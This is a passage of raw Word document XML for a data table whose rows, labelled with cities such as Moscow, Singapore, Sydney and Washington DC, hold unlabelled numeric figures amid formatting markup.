              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62E35CFB"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807</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4772ED83"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8278</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="00621063" w14:textId="77777777" w:rsidTr="001C3F72">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0EA02348" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Moscow, Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3076371B"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457</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="422CD841"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540</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D712076"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476</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07F72976"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603</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FFE3822"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561</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46BC46E5"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481</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FF8912A"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559</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DE5C728"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554</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33162DA3"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488</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74E19377"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471</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CE3207D"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5190</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="297E8664" w14:textId="77777777" w:rsidTr="001C3F72">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4D1B698D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Singapore, Singapore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FAD19EC"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473</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EC8307A"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504</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00F88593"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497</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5929164B"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516</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18491670"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515</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46EE87CD"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522</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47DC9764"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507</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A8C1F3"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543</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09257354"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509</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CC60E4A"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526</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="551F369A"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5112</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="2C317DB1" w14:textId="77777777" w:rsidTr="001C3F72">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75F67900" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Sydney, Australia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B8CEA91"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723</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="380F7001"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757</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43489A19"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650</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="534C92B6"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712</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BA543F5"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689</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E2CE0CD"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676</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AB8E74D"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768</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="128E2BC0"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687</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73310FC2"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647</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C36695B"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657</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E74A6D9"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6966</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="27A20535" w14:textId="77777777" w:rsidTr="001C3F72">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01AFC53F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Washington DC, United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F2EC279"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258</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FE78BD4"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546</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00EC15C4"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524</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C0BBA32"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391</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68F300A1"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321</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D6C1E98"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266</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47DE7B98"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517</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D384FE9"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527</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="345E6161"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871</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23CAA7DF"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491</w:t>
